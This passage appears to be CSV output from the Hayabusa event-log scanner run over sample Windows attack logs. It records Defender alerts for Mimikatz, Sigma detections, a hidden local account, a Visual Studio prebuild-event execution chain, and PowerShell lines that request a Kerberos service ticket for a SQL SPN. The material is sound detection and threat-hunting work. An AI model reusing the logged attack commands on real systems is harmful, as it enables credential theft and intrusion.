Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 12:28:01.651 +00:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimidrv.sys; file:_C:\Users\admmig\Documents\mimilib.dll | Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 12:28:01.651 +00:00,WIN10-client01.offsec.lan,1116,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 12:28:43.010 +00:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimikatz.exe | Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 12:28:44.317 +00:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimikatz.exe | Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-15 15:00:15.695 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:50007 (MSEDGEWIN10) | Dst: 10.0.2.17:135 (MSEDGEWIN10CLONE) | User: 
MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 6976 | PGUID: 747F3D96-CF4B-5FD8-0000-00101AD58700,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx +2020-12-15 15:00:15.695 +00:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/net_connection_win_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx +2020-12-15 15:00:15.695 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:50008 (MSEDGEWIN10) | Dst: 10.0.2.17:49666 (MSEDGEWIN10CLONE) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 6976 | PGUID: 747F3D96-CF4B-5FD8-0000-00101AD58700,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx +2020-12-15 15:00:15.695 +00:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/net_connection_win_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx +2020-12-17 10:38:33.951 +00:00,jump01.offsec.lan,7045,info,Persis,Service Installed,Name: WCESERVICE | Path: D:\Service\test.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2020-12-18 17:56:07.017 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Hidden Local Account Created | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\hideme0007$\(Default): Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 648 | PGUID: 
747F3D96-68DD-5FDD-0000-00101B660000,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_hidden_local_account_sysmon.evtx +2021-01-26 13:21:13.237 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\~DF0187A90594A6AC9B.TMP | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:13.558 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\NuGetScratch\lock\b8162606fcd2bea192a83c85aaff3292f908cfde | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:13.560 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\NuGetScratch\lock\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3 | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:13.561 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\NuGetScratch\lock\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3 | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 
00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:13.683 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.log | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:13.690 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe"" ""C:\Users\bouss\source\repos\blabla\blabla.sln"" | LID: 0x26f746a2 | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:13.690 +00:00,LAPTOP-JU4M3I0E,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:13.972 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\blabla.lastbuildstate | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 
00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:13.975 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:13.975 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:13.978 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | Process: C:\Windows\SysWOW64\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false | LID: 0x26f746a2 | PID: 23168 | PGUID: 00247C92-1749-6010-0000-0010EFAAD92E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.023 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: powershell.exe start-process notepad.exe | Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | User: 
LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | LID: 0x26f746a2 | PID: 18548 | PGUID: 00247C92-174A-6010-0000-0010C0B2D92E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.023 +00:00,LAPTOP-JU4M3I0E,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.296 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\SysWOW64\notepad.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: powershell.exe start-process notepad.exe | LID: 0x26f746a2 | PID: 28276 | PGUID: 00247C92-174A-6010-0000-001042DDD92E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.399 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.command.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.425 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 
00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.425 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.425 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.425 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.428 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" 
@""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp"" | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false | LID: 0x26f746a2 | PID: 18188 | PGUID: 00247C92-174A-6010-0000-0010DCFFD92E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.456 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\cl.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp"" | LID: 0x26f746a2 | PID: 11676 | PGUID: 00247C92-174A-6010-0000-0010A20ADA2E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.667 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\VCTIP.EXE"" | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\vctip.exe | User: LAPTOP-JU4M3I0E\bouss | 
Parent Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | LID: 0x26f746a2 | PID: 11636 | PGUID: 00247C92-174A-6010-0000-0010FF10DA2E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.871 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.write.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.871 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.write.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.871 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.read.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.872 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.read.1.tlog | 
Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:14.872 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.command.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:23.229 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Microsoft\VSApplicationInsights\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\20210126132123_277b7688d03b431eb925a7d64307d79a.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:23.303 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Microsoft\VSApplicationInsights\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\20210126132123_dd350a9897114eee834fb0993b4dee7e.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:23.305 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: 
C:\Users\bouss\AppData\Local\Microsoft\VSApplicationInsights\vstelf144292e-e3b2-4011-ac90-20e5c03fbce5\20210126132123_195f3c1acef04eaeb6f67d3ff46e5958.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 13:21:33.197 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\Downloads\prebuildevent_visual_studio.evtx | Process: C:\windows\system32\mmc.exe | PID: 22932 | PGUID: 00247C92-EC0A-600F-0000-00100AEFCC2C,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-30 09:13:13.309 +00:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:13.309 +00:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,$SPNName = 'MSSQLSvc/Svc-SQL-DB01.offsec.lan',rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:13.309 +00:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Add-Type): ""Add-Type"" ParameterBinding(Add-Type): name=""AssemblyName""; value=""System.IdentityModel""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder 
nPowerShell).evtx +2021-01-30 09:13:13.309 +00:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:13.309 +00:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:13.309 +00:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,Add-Type -AssemblyNAme System.IdentityModel,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:13.309 +00:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:17.546 +00:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $SPNName,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:17.546 +00:00,fs02.offsec.lan,4104,high,CredAccess,Request A Single Ticket via 
PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:17.561 +00:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""ArgumentList""; value=""MSSQLSvc/Svc-SQL-DB01.offsec.lan"" ParameterBinding(New-Object): name=""TypeName""; value=""System.IdentityModel.Tokens.KerberosRequestorSecurityToken"" TerminatingError(New-Object): ""Exception calling "".ctor"" with ""1"" argument(s): ""The NetworkCredentials provided were unable to create a Kerberos credential, see inner exception for details.""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:17.671 +00:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:17.671 +00:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-01-30 09:13:17.671 +00:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): 
